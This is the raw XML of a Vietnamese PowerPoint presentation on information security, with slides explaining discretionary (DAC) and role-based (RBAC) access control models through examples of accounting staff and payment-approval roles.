        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77366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0265E-A1DF-0CF5-EB13-B42B0567F5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CED4E2-EDAC-437A-620D-76E5FDB5ECD0}"/>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4111FF6D-251C-F895-C27F-5BC83C7B9742}"/>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C011F023-F498-3E72-FD99-7B867BDDC8AA}"/>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42F3A374-1526-FEE2-64DA-A09F68BB2C82}"/>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6F8FBB3B-3E67-E249-C289-7C2C035C473F}"/>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24661D22-8A37-F4F0-B13C-998CDB4C8866}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A0FB8ED-4AC2-20E6-D0A3-D932529EFC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10488887" y="2915208"/>
            <a:ext cx="6385481" cy="5965172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F5EB685-3F5B-B05F-6BF0-B20A1DD4F6DA}"/>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1. Mô hình kiểm soát truy cập tùy quyền (DAC)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E55106E-8D15-8AA4-AB8D-51AD76DF887E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4344093"/>
            <a:ext cx="9193487" cy="1708160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trong hệ thống </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cơ</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sở</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dữ</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liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>người dùng chỉ có thể truy cập vào các đối tượng khi được cấp quyền bởi người quản trị viên:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" u="sng"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dirty="0">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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>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N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hân viên kế toán chỉ có thể truy cập vào tài liệu kế toán, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>còn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> nhân viên dự án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thì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> chỉ có thể truy cập vào tài liệu dự án</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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08195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DEAB0-1B1E-E280-27D6-0E3802FCD1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20FF9-ACF3-B485-7ACE-E77672F7957B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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53DC6911-4B3B-4ABF-4C77-B6922856341F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0758C992-63F2-5CB2-2D16-5542F6DFE385}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742951" y="2698265"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63552FDF-1C78-8B23-15F0-93201F97EE07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAA908A6-B5AB-F8F3-3F2B-FD238581051B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF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0CF63C84-6065-4E25-EE81-C6D2DF3257ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2915208"/>
            <a:ext cx="9863328" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ô hình kiểm soát truy cập</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55063CD-77BA-8588-09BD-946DFC7AE468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3577107"/>
            <a:ext cx="9863328" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng">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2. Mô hình kiểm soát dựa trên vai trò (RBAC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" u="sng">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AF021CE-3302-DDDA-2CAA-4C4DA180DF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4344093"/>
            <a:ext cx="9067800" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trong hệ thống </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cơ sở dữ liệu, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>người dùng chỉ có thể truy cập vào các đối tượng khi được cấp quyền bởi người quản trị viên:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" b="0" i="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" u="sng">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vi-VN" sz="2500" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>uản trị viên </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tài khoản có thể quản lý các tài khoản và quyền truy cập vào hệ thống thanh toán của công ty, trong khi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>người giám sát</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> chỉ có quyền phê duyệt hoặc từ chối các giao dịch thanh toán đã được tạo bởi người dùng khác mà không thể tạo mới các giao dịch đó. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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DB54FED-40B8-585D-FFEF-D823DFF1E493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1307592" y="7412081"/>
            <a:ext cx="8797168" cy="1246495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Điều này thể hiện sự phân chia rõ ràng về vai trò và quyền hạn trong mô hình RBAC, giúp tăng cường an ninh và tuân thủ quy trình trong tổ chức.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C98644-6A5F-B4F5-368A-941152366491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10682593" y="3438428"/>
            <a:ext cx="6553200" cy="5591272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314563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880</TotalTime>
  <Words>2194</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>98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Cabin Medium</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Crimson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 Trắng Mô đun Trừu tượng Bản trình bày chiến lược Bản thuyết trình Kinh doanh</dc:title>
  <dc:creator>CHÂU CÔNG THOẠI</dc:creator>
  <cp:lastModifiedBy>Nguyễn Thành Phát</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-17T14:24:17Z</dcterms:modified>
  <dc:identifier>DAF9M7sjAYk</dc:identifier>
</cp:coreProperties>
</file>